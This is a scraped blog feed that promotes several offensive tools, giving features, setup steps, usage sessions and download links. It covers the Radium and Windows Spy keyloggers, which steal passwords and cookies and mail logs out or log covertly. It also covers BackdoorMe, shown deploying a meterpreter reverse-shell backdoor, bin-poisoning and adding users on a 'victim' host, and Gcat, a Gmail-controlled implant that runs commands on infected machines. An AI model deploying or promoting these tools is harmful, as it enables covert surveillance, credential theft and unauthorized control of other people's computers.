<li> Kali Linux - ROLLING </li>
<li> Ubuntu 14.04-16.04 LTS </li>
<li> Debian 8.5 </li>
<li> Linux Mint 18.1 </li>
</ul>
<br />
<b> Cloning: </b> <br />
<pre><code>git clone https://github.com/4w4k3/BeeLogger/.git</code></pre>
<br />
<b> Running: </b> <br />
<pre><code>sudo python bee.py</code></pre>
If you have another version of Python: <br />
<pre><code>sudo python2.7 bee.py</code></pre>
<br />
<b> Contact: </b> <br />
<strong> <a href="mailto:4w4k3@protonmail.com" target="_blank"> 4w4k3@protonmail.com </a> </strong> <br />
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/4w4k3/BeeLogger" target="_blank"> Download BeeLogger </a> </span> </b> </div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-81340113427189405852016-11-04T11:30:00.000-03:002016-11-04T11:30:14.656-03:00Radium-Keylogger - Python keylogger with multiple features<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-3oyWaQE322o/WBj2GMBxR4I/AAAAAAAAGc0/DgBkuQ5Q1Qo8LzA9X4mN3aZB-kIyzmXvwCLcB/s1600/Radium-Keylogger.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="124" src="https://4.bp.blogspot.com/-3oyWaQE322o/WBj2GMBxR4I/AAAAAAAAGc0/DgBkuQ5Q1Qo8LzA9X4mN3aZB-kIyzmXvwCLcB/s640/Radium-Keylogger.png" width="640" /></a></div>
<br />
<span class="repository-meta-content">Python keylogger with multiple features.</span><br />
<a name='more'></a><br />
<b><span style="font-size: large;">Features</span></b><br />
<ul>
<li>Applications and keystrokes logging</li>
<li>Screenshot logging</li>
<li>Drive tree structure</li>
<li>Logs sending by email</li>
<li>Password Recovery for</li>
<ul>
<li>Chrome</li>
<li>Mozilla</li>
<li>Filezilla</li>
<li>Core FTP</li>
<li>CyberDuck</li>
<li>FTPNavigator</li>
<li>WinSCP</li>
<li>Outlook</li>
<li>Putty</li>
<li>Skype</li>
<li>Generic Network</li>
</ul>
<li>Cookie stealer</li>
<li>Keylogger stub update mechanism</li>
<li>Gather system information</li>
<ul>
<li>Internal and External IP</li>
<li>Ipconfig /all output</li>
<li>Platform</li>
</ul>
</ul>
<div>
<br /></div>
<b><span style="font-size: large;">Usage</span></b><br />
<ul>
<li>Download the libraries if you are missing any.</li>
<li>Set the Gmail username and password and remember to check allow connection from less secure apps in gmail settings.</li>
<li>Set the FTP server. Make the folder Radium in which you'll store the new version of exe.</li>
<li>Set the FTP ip, username, password.</li>
<li>Remember to encode the password in base64.</li>
<li>Set the originalfilename variable in copytostartup(). This should be equal to the name of the exe.</li>
<li>Make the exe using Pyinstaller</li>
<li>Keylogs will be mailed after every 300 key strokes. This can be changed.</li>
<li>Screenshot is taken after every 500 key strokes. This can be changed.</li>
<li>Remember: If you make this into exe, change the variable "originalfilename" and "coppiedfilename" in function copytostartup().</li>
<li>Remember: whatever name you give to "coppiedfilename", should be given to checkfilename in deleteoldstub().</li>
</ul>
<br />
<b><span style="font-size: large;">Things to work on</span></b><br />
<ul>
<li>Persistance</li>
<li>Taking screenshots after a specific time. Making it keystrokes independent.</li>
<li>Webcam logging</li>
<li>Skype chat history stealer</li>
<li>Steam credential harvestor</li>
</ul>
<br />
<br />
<span style="font-size: large;"> <b> Requirements </b> </span> <br />
<ul>
<li> Install <a href="https://sourceforge.net/projects/pyhook/" target="_blank"> PyHook </a> </li>
<li> Install <a href="https://sourceforge.net/projects/pywin32/" target="_blank"> PyWin32 </a> </li>
<li> Install <a href="https://www.microsoft.com/en-us/download/details.aspx?id=44266" target="_blank"> Microsoft Visual C++ Compiler for Python </a> </li>
<li> Install <a href="http://www.pyinstaller.org/" target="_blank"> PyInstaller</a></li>
</ul>
<br />
<span style="font-size: large;"> <b> Tutorial </b> </span> <br />
<center>
<iframe allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/T0h_427L8u4" width="640"></iframe></center>
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/mehulj94/Radium-Keylogger" target="_blank"> Download Radium-Keylogger </a> </span> </b> </div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-70700391196884786632016-01-11T19:33:00.000-03:002016-01-11T19:33:00.156-03:00BackdoorMe - Powerful Auto-Backdooring Utility<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-fkodyOyo17I/Vo9JJ0rPbKI/AAAAAAAAFBc/CtjklEnDKKM/s1600/backdoorme.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="274" src="http://2.bp.blogspot.com/-fkodyOyo17I/Vo9JJ0rPbKI/AAAAAAAAFBc/CtjklEnDKKM/s640/backdoorme.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Backdoorme is a powerful utility capable of backdooring Unix machines with a slew of backdoors. Backdoorme uses a familiar metasploit interface with tremendous extensibility. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Backdoorme relies on having an existing SSH connection or credentials to the victim, through which it will transfer and deploy any backdoors. In the future, this reliance will be removed as the tool is expanded. To set up SSH, please see here: <a href="https://help.ubuntu.com/community/SSH/OpenSSH/Configuring" target="_blank"> https://help.ubuntu.com/community/SSH/OpenSSH/Configuring </a> </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Please only use Backdoorme with explicit permission - please don't hack without asking.</div>
<a name='more'></a> <br />
<br />
<div style="text-align: justify;">
<span style="font-size: large;"> <b> Usage </b> </span> </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Backdoorme comes with a number of built-in backdoors, modules, and auxiliary modules. Backdoors are specific components to create and deploy a specific backdoor, such as a netcat backdoor or msfvenom backdoor. Modules can be applied to any backdoor, and are used to make backdoors more potent, stealthy, or more readily tripped. Auxiliaries are useful operations that could be performed to help persistence. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To start backdoorme, first ensure that you have the required dependencies. </div>
<div>
<pre style="text-align: justify;"><code>$ python dependencies.py</code></pre>
</div>
<div style="text-align: justify;">
Launching backdoorme: </div>
<pre><code>$ python master.py ___ __ __ __ ___ / _ )___ _____/ /_____/ /__ ___ ____/ |/ /__ / _ / _ `/ __/ '_/ _ / _ \/ _ \/ __/ /|_/ / -_) /____/\_,_/\__/_/\_\\_,_/\___/\___/_/ /_/ /_/\__/ Welcome to BackdoorMe, a powerful backdooring utility. Type "help" to see the list of available commands. Type "addtarget" to set a target, and "open" to open an SSH connection to that target. Using local IP of 10.1.0.1. >> </code></pre>
To add a target: <br />
<pre><code>>> addtarget Target Hostname: 10.1.0.2 Username: victim Password: password123 + Target 1 Set! >> </code></pre>
<br />
<b> Backdoors </b> <br />
To use a backdoor, simply run the "use" keyword. <br />
<pre><code>>> use metasploit + Using current target 1. + Using Metasploit backdoor... (msf) >> </code></pre>
From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword. <br />
<pre><code>(msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name initd name of the backdoor False format elf format to write the backdoor to True lhost 10.1.0.1 local IP to connect back to True encoder none encoder to use for the backdoor False lport 4444 local port to connect back on True payload linux/x86/meterpreter/reverse_tcp payload to deploy in backdoor True (msf) >> set name apache + name => apache (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name apache name of the backdoor False ... </code></pre>
Currently enabled backdoors include: <br />
<ul>
<li> Bash </li>
<li> Bash2 (more reliable) </li>
<li> Metasploit </li>
<li> Netcat </li>
<li> Netcat-traditional </li>
<li> Perl </li>
<li> Php (does not automatically install a web server, but use the web module!) </li>
<li> Pupy </li>
<li> Python </li>
<li> Web (php - not the same backdoor as the above php backdoor) </li>
</ul>
<br />
<b> Modules </b> <br />
Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword. <br />
<pre><code>(msf) >> add poison + Poison module added </code></pre>
Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options. <br />
<pre><code>(msf) >> help ... Poison module options: Option Value Description Required ------ ----- ----------- -------- name ls name of command to poison False location /bin where to put poisoned files into False </code></pre>
Currently enabled modules include: <br />
<ul>
<li> Poison <ul>
<li> Performs bin poisoning on the target computer - it compiles an executable to call a system utility and an existing backdoor. </li>
<li> For example, if the bin poisoning module is triggered with "ls", it would would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tripping a user to run an existing backdoor more frequently. </li>
</ul>
</li>
<li> Cron <ul>
<li> Adds an existing backdoor to the root user's crontab to run with a given frequency. <br /> </li>
</ul>
</li>
<li> Web <ul>
<li> Sets up a web server and places a web page which triggers the backdoor. </li>
<li> Simply visit the site with your listener open and the backdoor will begin. </li>
</ul>
</li>
<li> Keylogger <ul>
<li> Ships a keylogger to the target and starts it. </li>
<li> Given the option to email the results to you every hour. </li>
</ul>
</li>
<li> User <ul>
<li> Adds a new user to the target. </li>
</ul>
</li>
<li> Startup <ul>
<li> Allows for backdoors to be spawned with the bashrc and init files. </li>
</ul>
</li>
</ul>
<br />
<b> Auxiliaries </b> <br />
In order to have persistence be more potent, some users may wish to install certain services on a target. To apply an auxiliary module, use the "apply" keyword. <br />
<pre><code>>> apply user + User Auxiliary Module added. </code></pre>
Auxiliaries also support the use of modules, so they can be triggered more steathily or more often. <br />
<pre><code>>> (user) add startup + Startup Module added. </code></pre>
Currently enabled auxiliaries include: <br />
<ul>
<li> User <ul>
<li> Adds a new user to the target. </li>
</ul>
</li>
</ul>
<br />
<b> Targets </b> <br />
Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. <br />
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/Kkevsterrr/backdoorme" target="_blank"> Download BackdoorMe </a> </span> </b> </div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-67855444720571543422015-09-28T18:28:00.000-03:002015-09-28T18:28:00.422-03:00Windows Spy Keylogger - Software to Log Keystrokes in Stealth Mode for 32-bit/64-bit processes on Windows XP/Vista/7/8/10<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dZRrHTgwx3k/VghrmP-LhxI/AAAAAAAAEpo/Kc0cvBiJcRc/s1600/windowsspykeylogger.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-dZRrHTgwx3k/VghrmP-LhxI/AAAAAAAAEpo/Kc0cvBiJcRc/s1600/windowsspykeylogger.jpg" /></a></div>
<br />
<div style="text-align: justify;">
<strong>Windows Spy Keylogger</strong> is the free software to help you covertly monitor all activities on your computer.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It intercepts everything that is typed on keyboard and stores
into one log file which you can view it anytime later. You can track <strong>logins</strong>, <strong>passwords</strong>, <strong>emails</strong>, <strong>chats</strong> and all other secret things typed by the user.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
You can also customize various options including stealth mode, <strong>run at startup</strong>, logfile etc. It is <strong>very simple </strong> to use with just a click of button.
</div>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="text-align: justify;">
One of the unique feature of this tool is that you can install it and run it on any computer <strong>without administrator</strong> permissions. Also it works on both <strong>32-bit</strong> & <strong>64-bit</strong> Windows platforms seamlessly.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It is suitable for parents who want to monitor activities of their children. Also <strong>cyber crime </strong>investigators, penetration testers, forensic analysts will find it very handy in their work.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Windows Spy Keylogger works on all platforms starting from Windows XP to new <strong>Windows 10</strong> version.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><span style="font-size: large;">
Features</span></b></div>
<ul>
<li style="text-align: justify;">Free Tool to Monitor Keystokes in stealth manner</li>
<li style="text-align: justify;"> Monitor both 32-bit & 64-bit applications</li>
<li style="text-align: justify;"> Automatically run at Startup</li>
<li style="text-align: justify;"> No need for administrator privileges</li>
<li style="text-align: justify;"> Settings dialog to change various options</li>
<li style="text-align: justify;"> Stores keyboard activities silently to a log file</li>
<li style="text-align: justify;"> Very easy to use with just a click of button</li>
<li style="text-align: justify;"> Displays current status of key logger at any time</li>
<li style="text-align: justify;"> Includes Installer for local installation & un-installation</li>
</ul>
<div style="text-align: justify;">
<b><span style="font-size: large;">How to Use?</span></b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
'Windows Spy Keylogger' is very easy to use tool with its cool GUI interface.</div>
<div style="text-align: justify;">
Here are the simple steps,</div>
<ul>
<li style="text-align: justify;">Run 'Windows Spy Keylogger' on your system</li>
<li style="text-align: justify;">It will show you the current status of Keylogger as seen in the screenshots below.</li>
<li style="text-align: justify;">Now you can just click on button below to Start or Stop Keylogger </li>
<li style="text-align: justify;">That's all :)</li>
</ul>
<div style="text-align: justify;">
Also you can customize various options (run at startup, log path,
version check etc) using the 'Settings Dialog' by click on the button
at bottom right corner.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="http://securityxploded.com/windows-spy-keylogger-free.php" target="_blank">Download Windows Spy Keylogger</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-77263185736489861002015-06-17T19:23:00.000-03:002015-06-17T19:23:00.366-03:00Gcat - A stealthy Backdoor that uses Gmail as a command and control server<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-vFWXvSnGYyc/VYGTUUggqQI/AAAAAAAAEO4/oJZK_r9uckg/s1600/gcat.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-vFWXvSnGYyc/VYGTUUggqQI/AAAAAAAAEO4/oJZK_r9uckg/s1600/gcat.jpg" /></a></div>
<br />
<div style="text-align: justify;">
A stealthy Python based backdoor that uses Gmail as a command and control server.<br />
<a name='more'></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><span style="font-size: large;">Setup </span></b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For this to work you need:</div>
<ul>
<li style="text-align: justify;">A Gmail account (<strong>Use a dedicated account! Do not use your personal one!</strong>)</li>
<li style="text-align: justify;">Turn on "Allow less secure apps" under the security settings of the account</li>
</ul>
<div style="text-align: justify;">
This repo contains two files:</div>
<ul>
<li style="text-align: justify;"><code>gcat.py</code> a script that's used to enumerate and issue commands to available clients</li>
<li style="text-align: justify;"><code>implant.py</code> the actual backdoor to deploy</li>
</ul>
<div style="text-align: justify;">
In both files, edit the <code>gmail_user</code> and <code>gmail_pwd</code> variables with the username and password of the account you previously setup.</div>
<div style="text-align: justify;">
You're probably going to want to compile <code>implant.py</code> into an executable using <a href="https://github.com/pyinstaller/pyinstaller">Pyinstaller</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-size: large;"><b>Usage</b></span></div>
<pre><code>Gcat
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-id ID Client to target
-jobid JOBID Job id to retrieve
-list List available clients
-info Retrieve info on specified client
Commands:
Commands to execute on an implant
-cmd CMD Execute a system command
-download PATH Download a file from a clients system
-exec-shellcode FILE Execute supplied shellcode on a client
-screenshot Take a screenshot
-lock-screen Lock the clients screen
-force-checkin Force a check in
-start-keylogger Start keylogger
-stop-keylogger Stop keylogger
</code></pre>
<ul>
<li>Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:</li>
</ul>
<pre><code>#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
</code></pre>
The output is a UUID string that uniquely identifies the system and the OS the implant is running on<br />
<ul>
<li>Let's issue a command to an implant:</li>
</ul>
<pre><code>#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
</code></pre>
Here we are telling <code>90b2cd83-cb36-52de-84ee-99db6ff41a11</code> to execute <code>ipconfig /all</code>, the script then outputs the <code>jobid</code> that we can use to retrieve the output of that command<br />
<ul>
<li>Lets get the results!</li>
</ul>
<pre><code>#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --
</code></pre>
<ul>
<li>That's the gist of it! But you can do much more as you can see from the usage of the script! ;)</li>
</ul>
<div>
<br /></div>
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/byt3bl33d3r/gcat" target="_blank">Download Gcat</a></span></b></div>
Unknownnoreply@blogger.com